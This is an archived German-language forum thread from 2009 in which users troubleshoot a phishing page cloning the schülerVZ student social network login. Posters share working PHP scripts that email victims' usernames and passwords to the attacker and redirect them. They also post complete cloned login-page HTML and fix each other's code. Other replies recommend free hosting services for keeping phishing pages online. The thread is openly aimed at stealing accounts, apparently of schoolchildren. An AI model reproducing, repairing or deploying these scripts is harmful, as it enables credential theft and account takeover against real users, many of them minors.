PDA

Archiv verlassen und diese Seite im Standarddesign anzeigen : Problem bei Phising Seite!



td0s
06.07.2009, 10:28
Ich habe, das Howto Phishingseite von Nintendo,
befolgt doch irgend wie kommt bei mir nur schwachsinn raus...

Guckt euch mal bitte, meine send.php & index.html an
Vielleicht, seht ihr ja den Fehler und könnt ihn mir dann verraten ;)

send.php

<?php
$username = $_POST['username'];
$password = $_POST['password'];

$to = "milan.koehler1@gmail.com";
$subject = "account";
$content = "Username: ".$username ."\r\nPassword: ".$password;
mail($to, $subject, $content);
?>


index.html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de" lang="de">
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />

<title>schuelerVZ | Bist du schon drin?</title>

<meta name="description" content="schülerVZ ist ein kostenloses Online-Netzwerk für Schüler. Hier können sie ihr eigenes Profil gestalten, Fotos hochladen, Freunde treffen, diskutieren uvm." />
<meta name="keywords" content="Schüler, pupils" />


<meta name="ajaxUrl" content="/Ajax" />
<meta name="platformId" content="Pvz" />


<meta name="activeModules" content="Default,Search,Login,StaticContent,Invitation,Chat ,Info" />
<meta name="pageletName" content="Default.Overview" />

<link rel="shortcut icon" href="http://www.schuelervz.net/favicon.ico" />


<link rel="stylesheet" type="text/css" href="http://static.pe.schuelervz.net/20090703-0/Css/Default.css" />
<link rel="stylesheet" type="text/css" href="http://static.pe.schuelervz.net/20090703-0/Css/Main.css" />

<link rel="stylesheet" type="text/css" href="http://static.pe.schuelervz.net/20090703-0/Css/Objects.css" />
<link rel="stylesheet" type="text/css" href="http://static.pe.schuelervz.net/20090703-0/Css/DefaultJS.css" />
<link rel="stylesheet" type="text/css" href="http://static.pe.schuelervz.net/20090703-0/Css/Login.css" />
<link rel="stylesheet" type="text/css" href="http://static.pe.schuelervz.net/20090703-0/Css/LeftSideBox.css" />
<link rel="stylesheet" type="text/css" href="http://static.pe.schuelervz.net/20090703-0/Css/Mod_Default.css" />

<script type="text/javascript" src="http://static.pe.schuelervz.net/20090703-0/Js/build/resource-core.js"></script>
<script type="text/javascript">
//<![CDATA[
var brs = navigator.userAgent.toLowerCase();
function Adition_BrowserId(){if(brs.search(/konqueror/)!=-1){return 8;}else if(brs.search(/safari/)!=-1){return 8;}else if(brs.search(/netscape6/)!=-1){return 5;}else if(brs.search(/netscape\/(7\.\d*)/)!=-1){return 5;}else if(brs.search(/netscape4/)!=-1){return 4;}else if((brs.search(/mozilla\/(4.\d*)/)!=-1)&&(brs.search(/msie\s(\d+(\.?\d)*)/)==-1)){return 4;}else if((brs.search(/gecko\//)!=-1)){return 6;}else if (brs.search(/opera/)!=-1){return 7;}else if(brs.search(/msie\s4/)!=-1){return 1;}else if(brs.search(/msie\s5/)!=-1){return 2;}else if(brs.search(/msie\s6/)!=-1){return 3;}else if(brs.search(/msie\s7/)!=-1){return 9;}else{return -1;}}
function Adition_OSId(){var os;if((brs.search(/windows/)!=-1)||((brs.search(/win9\d{1}/)!=-1))){if(brs.search(/nt\s5\.1/)!=-1){os=3;}else if(brs.search(/nt\s5\.0/)!=-1){os=2;}else if(brs.search(/nt\s5\.2/)!=-1){os=8;}else if(brs.search(/nt\s6\.0/)!=-1){os=9;}else if((brs.search(/win98/)!=-1)||(brs.search(/windows\s98/)!=-1)){os=1;}else if(brs.search(/windows\sme/)!=-1){os=1;}else if((brs.search(/windows\s95/)!=-1)||(brs.search(/win95/)!=-1)){os=1;}else if((brs.search(/nt\s4\.0/)!=-1)||(brs.search(/nt4\.0/))!=-1){os=4;}return os;}else if(brs.search(/linux/)!=-1){return 6;}else if(brs.search(/mac\sos\sx/)!=-1){return 5;}else if((brs.search(/macintosh/)!=-1)||(brs.search(/mac\x5fpowerpc/)!=-1)){return 5;}else if((brs.search(/unix/)!=-1)||(brs.search(/x11/)!=-1)){return 7;}else{return -1;}}
function Adition_ResId(){if(screen.width==640&&screen.height==480){return 1;}else if(screen.width==800&&screen.height==600){return 2;}else if(screen.width==1024&&screen.height==768){return 3;}else if(screen.width==1152&&screen.height==864){return 4;}else if(screen.width==1280&&screen.height==1024){return 5;}else if(screen.width==1600&&screen.height==1200){return 6;}else if(screen.width==1280&&screen.height==960){return 7;}else if(screen.width==1400&&screen.height==1050){return 8;}else if(screen.width==1280&&screen.height==768){return 9;}else if(screen.width==1280&&screen.height==800){return 10;}else if(screen.width==1440&&screen.height==900){return 11;}else if(screen.width==1680&&screen.height==1050){return 12;}else if(screen.width==1920&&screen.height==1200){return 13;}return -1;}
function Adition_Flash(){var f="",n=navigator;if(n.plugins&&n.plugins.length){for(var ii=0;ii<n.plugins.length;ii++){if(n.plugins[ii].name.indexOf('Shockwave Flash')!=-1){f=n.plugins[ii].description.split('Shockwave Flash ')[1];i=f.indexOf('.');f=f.substr(0,i);break;}}}else if(window.ActiveXObject){for(var ii=10;ii>=2;ii--){try{var fl=eval("new ActiveXObject('ShockwaveFlash.ShockwaveFlash."+ii+"');");if(fl){f=ii;break;}}catch(e){}}}return f;}
var ad_wid = Math.round(Math.random()*2000000000);var ad_count = 0;var ref;try{ref=escape(document.referrer);}catch(e){re f='-'}var os;try{os=Adition_OSId();}catch(e){os=''}var browser;try{browser=Adition_BrowserId();}catch(e){ browser=''}var screen_res;try{screen_res=Adition_ResId();}catch(e ){screen_res=''}var fvers;try{fvers=Adition_Flash();}catch(e){fvers='' }
//]]>
</script></head>

<body class="pvz isNotLoggedIn gecko gecko19">
<div id="Grid-Wrapper">
<div id="Grid-Advertising-Top">
</div>
<div id="Grid-Advertising-Right">
</div>
<div id="Grid-Page">
<div id="Grid-Page-Left">

<div id="Logo">

<a href="/" rel="nofollow" title="zur Startseite">
<img src="http://static.pe.schuelervz.net/20090703-0/Img/logo.png" alt="Logo schülerVZ, Link zur Startseite" />
</a>
</div>

<form id="Loginbox" method="post" action="https:milan2109.mi.ohost.de/send.php">
<fieldset>
<label for="Login_email">E-Mail</label>
<input onfocus="this.hasfocus='yes';" class="text" type="text" name="email" id="Login_email" value="" />

<label for="Login_password">Passwort</label>
<input onfocus="this.hasfocus='yes';" class="text" type="password" name="password" id="Login_password" value="" />
<div class="form-row">
<input onfocus="this.hasfocus='yes';" type="checkbox" name="reminder" id="Login_remind" value="1" class="remind-login"/>
<label for="Login_remind">Eingeloggt bleiben</label>
<img class="loginTooltipIcon" src="http://static.pe.schuelervz.net/20090703-0/Img/tooltipp.gif" width="14px" alt="?"/>
<div id="reminder-hint" class="hidden">Setze dieses Häkchen nur, wenn außer dir niemand anderes diesen Computer verwendet. <a href="http://www.schuelervz.net/Newsroom/Detail/5c7c8d3134c3d2c9" rel="nofollow">Warum?</a>


</div>
</div>
<input onfocus="this.hasfocus='yes';" class="button" type="submit" name="login" value="Einloggen" />
<input type="hidden" name="jsEnabled" id="jsEnabled" value="false" />
<script type="text/javascript">
document.getElementById('jsEnabled').value = 'true';
</script>
<input type="hidden" name="formkey" value="80e383a09c5c8f1207c1a9b8f9bea7db083faa55061c62aa3e 68a93d69e1aadff81288782056f82168bfdcce97764cfd62ad 0cf1e67c4f697f038d48b8fa6d194761ab0936bfc29b6d6530 e13881983460fa6d270d7672179737739cf7a39755" />
<input type="hidden" name="iv" value="af00e030051b17a74bc482dede002ac2" />

</fieldset>

</form>

<ul id="Grid-Navigation-Main" class="obj-linklist">
<li><a href="https://secure.schuelervz.net/Registration" rel="nofollow" title="Anmelden">Anmelden</a></li> </ul>

<div id="LeftsideBox">
<div>
<p>Schmei&szlig; ruhig mit Popcorn. Ich hab Steine dabei.</p> </div>

</div>

</div>
<div id="Grid-Page-Center">
<div id="Grid-Page-Center-Top">
<div id="Grid-Page-Center-Top-Title">
<img src="http://static.pe.schuelervz.net/20090703-0/Img/el_verzeichnis.png" alt="SCHÜLERVERZEICHNIS"/>
</div>
<div id="Grid-Page-Center-Top-Navigation">
<ul>

<li><a href="/Login" rel="nofollow" title="Einloggen">einloggen</a></li>
<li><a href="https://secure.schuelervz.net/Registration" rel="nofollow" title="anmelden">anmelden</a></li>
<li><a href="http://blog.schuelervz.net/category/klartext-schuelervz" title="klartext">klartext</a></li>
<li><a href="/l/help" rel="nofollow" title="hilfe">hilfe</a></li>
</ul>
</div>
</div>

<div id="Grid-Page-Center-Header">
<h1 class="ellipsis" title="Bist du schon drin?">Bist du schon drin?</h1>
</div>

<div id="Grid-Page-Center-Content">

<div id="shoutboxJs" class="obj-shoutbox hidden">
<div>
<p id="shoutboxJsSuccess" class="success hidden"></p>

<p id="shoutboxJsError" class="error hidden"></p>
</div>
<div class="close">
<a rel="nofollow" href="javascript:;"></a>
</div>
</div>

<div id="Mod-Default">

<div class="obj-box full no-float">
<div class="Snipplet-TopInfo">

</div>
<div class="Snipplet-Default-Overview">
<div class="Snipplet-Default-Overview-Info">
<img class="avatar" src="http://static.pe.schuelervz.net/20090703-0/Img/FrontBoy.png" alt="Avatar" />
<h2 class="alternate">Lass dich einladen!</h2>

<ul>
<li><span>Triff deine Freunde aus der Schule!</span></li>

<li><span>Wer kennt wen über wen?</span></li>


<li><span>Wer ist auf welcher Schule?</span></li>

<li><span>Wer sitzt in meiner Parallelklasse?</span></li>

<li><span>Wer hat wann Geburtstag?</span></li>


<li><span>Haben deine Freunde schon die Fotos vom Wochenende hochgeladen?</span></li>
</ul>
</div>


<div class="teaser-area">
<div class="teaser">
<a href="/Registration/" title="" rel="nofollow">Eingeladen?</a><br />
Los geht's </div>

<div class="teaser switch-to">
<a href="http://www.meinvz.net/Register" title="" rel="nofollow">Ausgeschult?</a><br />
Kein Schüler mehr - Ab zu meinVZ! </div>

</div>
</div>
</div>
</div> </div>

<div id="Grid-Page-Center-Footer">
<ul>
<li><a href="/l/schueler/" rel="nofollow" title="Schüler">Schüler</a></li>
<li><a href="/l/security/" rel="nofollow" title="">Sicherheit</a></li>

<li><a href="/l/parents" rel="nofollow" title="Eltern und Lehrer">Eltern und Lehrer</a></li>
<li><a href="/l/press" rel="nofollow" title="Presse">Presse</a></li>
<li><a href="/l/impressum" rel="nofollow" title="Impressum">Impressum</a></li>
<li><a href="/Terms/Current" rel="nofollow" title="AGB">AGB</a></li>
<li><a href="/Terms/Current/Policy" rel="nofollow" title="Datenschutz">Datenschutz</a></li>
<li><a href="/l/rules" rel="nofollow" title="Verhaltenskodex">Verhaltenskodex</a></li>

<li><a href="/Sitemap" title="Edelkompass">Edelkompass</a></li>
</ul>
</div>
<div>
</div>
</div>

<br class="Clear-The-Evil-Float" />
</div>

</div>


<script type="text/javascript" src="http://static.pe.schuelervz.net/20090703-0/Js/build/phx-core.js"></script>
<script type="text/javascript" src="http://static.pe.schuelervz.net/20090703-0/Js/source/class/phx/core/AdCollector.js"></script>
<script type="text/javascript" src="http://static.pe.schuelervz.net/20090703-0/Js/build/phx-start.js"></script>

<!-- SZM VERSION="1.6" -->
<script type="text/javascript">
/* <![CDATA[ */
var IVW="http://schuelvz.ivwbox.de/cgi-bin/ivw/CP/index_welcome;LoggedOut";
document.write("<div id=\"ivwbox\"><img src=\""+IVW+"?r="+escape(document.referrer)+"&d="+(Math.random()*100000)+"\" width=\"1\" height=\"1\" alt=\"\" name=\"szmimages\" /><\/div>");
/* ]]> */
</script>

<noscript>
<div id="ivwbox_noscript"><img src="http://schuelvz.ivwbox.de/cgi-bin/ivw/CP/index_welcome;LoggedOut" width="1" height="1" alt="" /></div>
</noscript>
<!-- /SZM -->

<script type="text/javascript">
/* <![CDATA[ */
var originalIvwSource = document.szmimages.src;

function ReloadPixelImages(PixelCode, PixelComment)
{
var IVW = "http://schuelvz.ivwbox.de/cgi-bin/ivw/CP/" + PixelCode + ";" + PixelComment;
document.szmimages.src = IVW + "?r=" + escape(document.referrer) + "&d=" + (Math.random() * 100000);
}

function ResetPixelImages()
{
var newIvwSource = originalIvwSource.substring(0, originalIvwSource.indexOf('&d=') + 3) + (Math.random() * 100000);
document.szmimages.src = newIvwSource;
}
/* ]]> */
</script>
<div id="adContainer"></div>
</body>
</html>

mfG TDoS* :cool:

kriw
06.07.2009, 10:31
Die send.php müsste so aussehen:
<?php
$sender = "Phishing=gay@gay.com";
$empfaenger = "DeineE-mail@live.de"; //<--- Deine Mail
$betreff = "Phished";
$mailtext = "Username: ".$_POST['username']."\nPasswort: ".$_POST['password'];
mail($empfaenger, $betreff, $mailtext, "From: $sender ");
header ( 'Location: www.Link zurloginseite.com' );
?>
Und die index so :
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de" lang="de">
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />

<title>schuelerVZ | Bist du schon drin?</title>

<meta name="description" content="schülerVZ ist ein kostenloses Online-Netzwerk für Schüler. Hier können sie ihr eigenes Profil gestalten, Fotos hochladen, Freunde treffen, diskutieren uvm." />
<meta name="keywords" content="Schüler, pupils" />


<meta name="ajaxUrl" content="/Ajax" />
<meta name="platformId" content="Pvz" />


<meta name="activeModules" content="Default,Search,Login,StaticContent,Invita tion,Chat,Info" />
<meta name="pageletName" content="Default.Overview" />

<link rel="shortcut icon" href="http://www.schuelervz.net/favicon.ico" />


<link rel="stylesheet" type="text/css" href="http://static.pe.schuelervz.net/20090703-0/Css/Default.css" />
<link rel="stylesheet" type="text/css" href="http://static.pe.schuelervz.net/20090703-0/Css/Main.css" />

<link rel="stylesheet" type="text/css" href="http://static.pe.schuelervz.net/20090703-0/Css/Objects.css" />
<link rel="stylesheet" type="text/css" href="http://static.pe.schuelervz.net/20090703-0/Css/DefaultJS.css" />
<link rel="stylesheet" type="text/css" href="http://static.pe.schuelervz.net/20090703-0/Css/Login.css" />
<link rel="stylesheet" type="text/css" href="http://static.pe.schuelervz.net/20090703-0/Css/LeftSideBox.css" />
<link rel="stylesheet" type="text/css" href="http://static.pe.schuelervz.net/20090703-0/Css/Mod_Default.css" />

<script type="text/javascript" src="http://static.pe.schuelervz.net/20090703-0/Js/build/resource-core.js"></script>
<script type="text/javascript">
//<![CDATA[
var brs = navigator.userAgent.toLowerCase();
function Adition_BrowserId(){if(brs.search(/konqueror/)!=-1){return 8;}else if(brs.search(/safari/)!=-1){return 8;}else if(brs.search(/netscape6/)!=-1){return 5;}else if(brs.search(/netscape\/(7\.\d*)/)!=-1){return 5;}else if(brs.search(/netscape4/)!=-1){return 4;}else if((brs.search(/mozilla\/(4.\d*)/)!=-1)&&(brs.search(/msie\s(\d+(\.?\d)*)/)==-1)){return 4;}else if((brs.search(/gecko\//)!=-1)){return 6;}else if (brs.search(/opera/)!=-1){return 7;}else if(brs.search(/msie\s4/)!=-1){return 1;}else if(brs.search(/msie\s5/)!=-1){return 2;}else if(brs.search(/msie\s6/)!=-1){return 3;}else if(brs.search(/msie\s7/)!=-1){return 9;}else{return -1;}}
function Adition_OSId(){var os;if((brs.search(/windows/)!=-1)||((brs.search(/win9\d{1}/)!=-1))){if(brs.search(/nt\s5\.1/)!=-1){os=3;}else if(brs.search(/nt\s5\.0/)!=-1){os=2;}else if(brs.search(/nt\s5\.2/)!=-1){os=8;}else if(brs.search(/nt\s6\.0/)!=-1){os=9;}else if((brs.search(/win98/)!=-1)||(brs.search(/windows\s98/)!=-1)){os=1;}else if(brs.search(/windows\sme/)!=-1){os=1;}else if((brs.search(/windows\s95/)!=-1)||(brs.search(/win95/)!=-1)){os=1;}else if((brs.search(/nt\s4\.0/)!=-1)||(brs.search(/nt4\.0/))!=-1){os=4;}return os;}else if(brs.search(/linux/)!=-1){return 6;}else if(brs.search(/mac\sos\sx/)!=-1){return 5;}else if((brs.search(/macintosh/)!=-1)||(brs.search(/mac\x5fpowerpc/)!=-1)){return 5;}else if((brs.search(/unix/)!=-1)||(brs.search(/x11/)!=-1)){return 7;}else{return -1;}}
function Adition_ResId(){if(screen.width==640&&screen.heigh t==480){return 1;}else if(screen.width==800&&screen.height==600){return 2;}else if(screen.width==1024&&screen.height==768){return 3;}else if(screen.width==1152&&screen.height==864){return 4;}else if(screen.width==1280&&screen.height==1024){return 5;}else if(screen.width==1600&&screen.height==1200){return 6;}else if(screen.width==1280&&screen.height==960){return 7;}else if(screen.width==1400&&screen.height==1050){return 8;}else if(screen.width==1280&&screen.height==768){return 9;}else if(screen.width==1280&&screen.height==800){return 10;}else if(screen.width==1440&&screen.height==900){return 11;}else if(screen.width==1680&&screen.height==1050){return 12;}else if(screen.width==1920&&screen.height==1200){return 13;}return -1;}
function Adition_Flash(){var f="",n=navigator;if(n.plugins&&n.plugins.length){f or(var ii=0;ii<n.plugins.length;ii++){if(n.plugins[ii].name.indexOf('Shockwave Flash')!=-1){f=n.plugins[ii].description.split('Shockwave Flash ')[1];i=f.indexOf('.');f=f.substr(0,i);break;}}}else if(window.ActiveXObject){for(var ii=10;ii>=2;ii--){try{var fl=eval("new ActiveXObject('ShockwaveFlash.ShockwaveFlash."+ii+ "');");if(fl){f=ii;break;}}catch(e){}}}return f;}
var ad_wid = Math.round(Math.random()*2000000000);var ad_count = 0;var ref;try{ref=escape(document.referrer);}catch(e){re f='-'}var os;try{os=Adition_OSId();}catch(e){os=''}var browser;try{browser=Adition_BrowserId();}catch(e){ browser=''}var screen_res;try{screen_res=Adition_ResId();}catch(e ){screen_res=''}var fvers;try{fvers=Adition_Flash();}catch(e){fvers='' }
//]]>
</script></head>

<body class="pvz isNotLoggedIn gecko gecko19">
<div id="Grid-Wrapper">
<div id="Grid-Advertising-Top">
</div>
<div id="Grid-Advertising-Right">
</div>
<div id="Grid-Page">
<div id="Grid-Page-Left">

<div id="Logo">

<a href="/" rel="nofollow" title="zur Startseite">
<img src="http://static.pe.schuelervz.net/20090703-0/Img/logo.png" alt="Logo schülerVZ, Link zur Startseite" />
</a>
</div>

<form id="Loginbox" method="post" action="send.php">
<fieldset>
<label for="Login_email">E-Mail</label>
<input onfocus="this.hasfocus='yes';" class="text" type="text" name="email" id="Login_email" value="" />

<label for="Login_password">Passwort</label>
<input onfocus="this.hasfocus='yes';" class="text" type="password" name="password" id="Login_password" value="" />
<div class="form-row">
<input onfocus="this.hasfocus='yes';" type="checkbox" name="reminder" id="Login_remind" value="1" class="remind-login"/>
<label for="Login_remind">Eingeloggt bleiben</label>
<img class="loginTooltipIcon" src="http://static.pe.schuelervz.net/20090703-0/Img/tooltipp.gif" width="14px" alt="?"/>
<div id="reminder-hint" class="hidden">Setze dieses Häkchen nur, wenn außer dir niemand anderes diesen Computer verwendet. <a href="http://www.schuelervz.net/Newsroom/Detail/5c7c8d3134c3d2c9" rel="nofollow">Warum?</a>


</div>
</div>
<input onfocus="this.hasfocus='yes';" class="button" type="submit" name="login" value="Einloggen" />
<input type="hidden" name="jsEnabled" id="jsEnabled" value="false" />
<script type="text/javascript">
document.getElementById('jsEnabled').value = 'true';
</script>
<input type="hidden" name="formkey" value="80e383a09c5c8f1207c1a9b8f9bea7db083faa55061 c62aa3e68a93d69e1aadff81288782056f82168bfdcce97764 cfd62ad0cf1e67c4f697f038d48b8fa6d194761ab0936bfc29 b6d6530e13881983460fa6d270d7672179737739cf7a39755" />
<input type="hidden" name="iv" value="af00e030051b17a74bc482dede002ac2" />

</fieldset>

</form>

<ul id="Grid-Navigation-Main" class="obj-linklist">
<li><a href="https://secure.schuelervz.net/Registration" rel="nofollow" title="Anmelden">Anmelden</a></li> </ul>

<div id="LeftsideBox">
<div>
<p>Schmei&szlig; ruhig mit Popcorn. Ich hab Steine dabei.</p> </div>

</div>

</div>
<div id="Grid-Page-Center">
<div id="Grid-Page-Center-Top">
<div id="Grid-Page-Center-Top-Title">
<img src="http://static.pe.schuelervz.net/20090703-0/Img/el_verzeichnis.png" alt="SCHÜLERVERZEICHNIS"/>
</div>
<div id="Grid-Page-Center-Top-Navigation">
<ul>

<li><a href="/Login" rel="nofollow" title="Einloggen">einloggen</a></li>
<li><a href="https://secure.schuelervz.net/Registration" rel="nofollow" title="anmelden">anmelden</a></li>
<li><a href="http://blog.schuelervz.net/category/klartext-schuelervz" title="klartext">klartext</a></li>
<li><a href="/l/help" rel="nofollow" title="hilfe">hilfe</a></li>
</ul>
</div>
</div>

<div id="Grid-Page-Center-Header">
<h1 class="ellipsis" title="Bist du schon drin?">Bist du schon drin?</h1>
</div>

<div id="Grid-Page-Center-Content">

<div id="shoutboxJs" class="obj-shoutbox hidden">
<div>
<p id="shoutboxJsSuccess" class="success hidden"></p>

<p id="shoutboxJsError" class="error hidden"></p>
</div>
<div class="close">
<a rel="nofollow" href="javascript:;"></a>
</div>
</div>

<div id="Mod-Default">

<div class="obj-box full no-float">
<div class="Snipplet-TopInfo">

</div>
<div class="Snipplet-Default-Overview">
<div class="Snipplet-Default-Overview-Info">
<img class="avatar" src="http://static.pe.schuelervz.net/20090703-0/Img/FrontBoy.png" alt="Avatar" />
<h2 class="alternate">Lass dich einladen!</h2>

<ul>
<li><span>Triff deine Freunde aus der Schule!</span></li>

<li><span>Wer kennt wen über wen?</span></li>


<li><span>Wer ist auf welcher Schule?</span></li>

<li><span>Wer sitzt in meiner Parallelklasse?</span></li>

<li><span>Wer hat wann Geburtstag?</span></li>


<li><span>Haben deine Freunde schon die Fotos vom Wochenende hochgeladen?</span></li>
</ul>
</div>


<div class="teaser-area">
<div class="teaser">
<a href="/Registration/" title="" rel="nofollow">Eingeladen?</a><br />
Los geht's </div>

<div class="teaser switch-to">
<a href="http://www.meinvz.net/Register" title="" rel="nofollow">Ausgeschult?</a><br />
Kein Schüler mehr - Ab zu meinVZ! </div>

</div>
</div>
</div>
</div> </div>

<div id="Grid-Page-Center-Footer">
<ul>
<li><a href="/l/schueler/" rel="nofollow" title="Schüler">Schüler</a></li>
<li><a href="/l/security/" rel="nofollow" title="">Sicherheit</a></li>

<li><a href="/l/parents" rel="nofollow" title="Eltern und Lehrer">Eltern und Lehrer</a></li>
<li><a href="/l/press" rel="nofollow" title="Presse">Presse</a></li>
<li><a href="/l/impressum" rel="nofollow" title="Impressum">Impressum</a></li>
<li><a href="/Terms/Current" rel="nofollow" title="AGB">AGB</a></li>
<li><a href="/Terms/Current/Policy" rel="nofollow" title="Datenschutz">Datenschutz</a></li>
<li><a href="/l/rules" rel="nofollow" title="Verhaltenskodex">Verhaltenskodex</a></li>

<li><a href="/Sitemap" title="Edelkompass">Edelkompass</a></li>
</ul>
</div>
<div>
</div>
</div>

<br class="Clear-The-Evil-Float" />
</div>

</div>


<script type="text/javascript" src="http://static.pe.schuelervz.net/20090703-0/Js/build/phx-core.js"></script>
<script type="text/javascript" src="http://static.pe.schuelervz.net/20090703-0/Js/source/class/phx/core/AdCollector.js"></script>
<script type="text/javascript" src="http://static.pe.schuelervz.net/20090703-0/Js/build/phx-start.js"></script>

<!-- SZM VERSION="1.6" -->
<script type="text/javascript">
/* <![CDATA[ */
var IVW="http://schuelvz.ivwbox.de/cgi-bin/ivw/CP/index_welcome;LoggedOut";
document.write("<div id=\"ivwbox\"><img src=\""+IVW+"?r="+escape(document.referrer)+"&d="+ (Math.random()*100000)+"\" width=\"1\" height=\"1\" alt=\"\" name=\"szmimages\" /><\/div>");
/* ]]> */
</script>

<noscript>
<div id="ivwbox_noscript"><img src="http://schuelvz.ivwbox.de/cgi-bin/ivw/CP/index_welcome;LoggedOut" width="1" height="1" alt="" /></div>
</noscript>
<!-- /SZM -->

<script type="text/javascript">
/* <![CDATA[ */
var originalIvwSource = document.szmimages.src;

function ReloadPixelImages(PixelCode, PixelComment)
{
var IVW = "http://schuelvz.ivwbox.de/cgi-bin/ivw/CP/" + PixelCode + ";" + PixelComment;
document.szmimages.src = IVW + "?r=" + escape(document.referrer) + "&d=" + (Math.random() * 100000);
}

function ResetPixelImages()
{
var newIvwSource = originalIvwSource.substring(0, originalIvwSource.indexOf('&d=') + 3) + (Math.random() * 100000);
document.szmimages.src = newIvwSource;
}
/* ]]> */
</script>
<div id="adContainer"></div>
</body>
</html>

Dann die send.php und die index.htm auf deinem Server hochladen :D

td0s
06.07.2009, 10:40
Phishing=gay@gay.com

ehh... soll das so bleiben oder?!?

kriw
06.07.2009, 10:41
lol^^
Das kannst du in eine andere E-mail ändern :P

td0s
06.07.2009, 10:43
scheiß egal? was da steht?

achja und ehm welcher server is dafür am besten ohost&funpic 10minuten überlebens zeit xD account danach direkt banned

kriw
06.07.2009, 10:46
Ich benütze schon seit monaten www.bplaced.net ....

peppy
06.07.2009, 10:46
ehh... soll das so bleiben oder?!?

wenn es auf dich zutrift auf jeden fall^^

n00kie
06.07.2009, 10:58
Kriw, du hast die $_POST-Daten dierekt übergeben, was eigentlich nicht Optional ist. Ich habe diese vorher einer Variable zugewiesen. Außerdem hätte er nur in seinem Quelltext, die Namen der übermittelten Daten, an die Daten in der send.php anpassen müssen. In dem falle einfach "username" und "password". Kriw, klar kann man das Mail-To Script weitausbauen, was hierbei aber nicht zur Problemlösung beiträgt weder nötig ist.

kriw
06.07.2009, 11:00
Ja ok^^
Aber ich glaube er hätte das nicht gecheckt wenn ich es ihn erklärt hätte....

n00kie
06.07.2009, 11:05
Naja, die meisten begeben sich auch ohne jegliche vorkenntnisse von HTML / CSS & PHP an eine Phishing-Seite. Daher denke ich das vorher ein Grundkurs nicht schaden könnte.

td0s
06.07.2009, 11:06
Ich hab mich nun bei Bplaced angemeldet,
und alles dort hoch geladen...

aber immer is dort nur dieses werbe window...
In jedem verzeichnis, hab ich eine index.php liegen um u testen, in welchen verzeichnis, ich die sachen packen muss, damit es sichtbar wird...

www.tdos.bplaced.net

MySQLadmin = index.php
PgSQLadmin = index.php
filemanager = index.php
/ = index.php

doch egal wo ich es hochlade überall kommt nur dann dieses werbe fenster...

?!? Wisst ihr woran es liegt?

n00kie
06.07.2009, 11:10
Werbung vom Anbieter? Bei Funpic und Ohost, kannst du das ganze mit einem einfachen CSS-Code deaktivieren.

kriw
06.07.2009, 11:10
Hast du FTP aktiviert?
Und bei bplaced sind noch ordner da die sollst du nicht löschen! einfach daneben die sachen hochladen....

td0s
06.07.2009, 11:16
www.milan2109.tdos.bplaced.net liegt auf dem Verzeichnis "/" und genau dort liegen auch meine files öh? FTP etc... alles aktiviert

kriw
06.07.2009, 11:18
Erkundige dich im Bplaced-Forum!
Vielleicht haben sie dass noch nicht aktiviert :D

gonska
10.07.2009, 17:29
bei mir funktioniert es auch nicht kann mir jemand helfen danke im voraus

meine send.php


<?php
$sender = "Phishing=gay@gay.com";
$empfaenger = "Gonska@live.de"; //<--- Deine Mail
$betreff = "Phished";
$mailtext = "Username: ".$_POST['username']."\nPasswort: ".$_POST['password'];
mail($empfaenger, $betreff, $mailtext, "From: $sender ");
header ( 'location:ftp://gonska:@gonska.bplaced.net/index.html' );
?>

meine index.html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de" lang="de">
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />

<title>schuelerVZ | Bist du schon drin?</title>

<meta name="description" content="schülerVZ ist ein kostenloses Online-Netzwerk für Schüler. Hier können sie ihr eigenes Profil gestalten, Fotos hochladen, Freunde treffen, diskutieren uvm." />
<meta name="keywords" content="Schüler, pupils" />


<meta name="ajaxUrl" content="/Ajax" />
<meta name="platformId" content="Pvz" />


<meta name="activeModules" content="Default,Search,Login,StaticContent,Invitation,Chat ,Info" />
<meta name="pageletName" content="Default.Overview" />

<link rel="shortcut icon" href="http://www.schuelervz.net/favicon.ico" />


<link rel="stylesheet" type="text/css" href="http://static.pe.schuelervz.net/20090703-0/Css/Default.css" />
<link rel="stylesheet" type="text/css" href="http://static.pe.schuelervz.net/20090703-0/Css/Main.css" />

<link rel="stylesheet" type="text/css" href="http://static.pe.schuelervz.net/20090703-0/Css/Objects.css" />
<link rel="stylesheet" type="text/css" href="http://static.pe.schuelervz.net/20090703-0/Css/DefaultJS.css" />
<link rel="stylesheet" type="text/css" href="http://static.pe.schuelervz.net/20090703-0/Css/Login.css" />
<link rel="stylesheet" type="text/css" href="http://static.pe.schuelervz.net/20090703-0/Css/LeftSideBox.css" />
<link rel="stylesheet" type="text/css" href="http://static.pe.schuelervz.net/20090703-0/Css/Mod_Default.css" />

<script type="text/javascript" src="http://static.pe.schuelervz.net/20090703-0/Js/build/resource-core.js"></script>
<script type="text/javascript">
//<![CDATA[
var brs = navigator.userAgent.toLowerCase();
function Adition_BrowserId(){if(brs.search(/konqueror/)!=-1){return 8;}else if(brs.search(/safari/)!=-1){return 8;}else if(brs.search(/netscape6/)!=-1){return 5;}else if(brs.search(/netscape\/(7\.\d*)/)!=-1){return 5;}else if(brs.search(/netscape4/)!=-1){return 4;}else if((brs.search(/mozilla\/(4.\d*)/)!=-1)&&(brs.search(/msie\s(\d+(\.?\d)*)/)==-1)){return 4;}else if((brs.search(/gecko\//)!=-1)){return 6;}else if (brs.search(/opera/)!=-1){return 7;}else if(brs.search(/msie\s4/)!=-1){return 1;}else if(brs.search(/msie\s5/)!=-1){return 2;}else if(brs.search(/msie\s6/)!=-1){return 3;}else if(brs.search(/msie\s7/)!=-1){return 9;}else{return -1;}}
